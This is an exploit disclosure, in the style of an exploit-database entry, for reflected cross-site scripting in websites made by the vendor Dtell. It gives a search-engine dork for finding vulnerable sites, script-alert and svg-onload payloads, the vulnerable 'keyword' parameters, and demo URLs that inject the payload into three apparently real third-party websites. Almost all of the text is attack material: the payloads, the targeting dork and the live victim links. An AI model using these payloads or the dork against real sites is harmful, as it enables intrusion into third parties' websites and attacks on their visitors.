# Exploit Title : Dtell - Cross Site Scripting # Author : Xmall75 # Vendor Homepage : www.dtell.com.tw # Date : 3 June 2020 # Tested on : Windows # Dork : intext:"Designed by Dtell" # Payload : <script>alert("Xmall75");</script> <svg onload=alert("Xmall75")> and other payloads. # XSS : site.com/products_search.php?keyword=[your payload here]. site.com/result.php?keyword=[your payload here]. # Demo : www.sbarcotech.com/products_search.php?keyword=<script>alert("Xmall75");</script> www.printecht.com/result.php?keyword=<script>alert();</script> www.tbpchc.com/eng/result.php?keyword=<script>alert();</script> # xmall75.id@gmail.com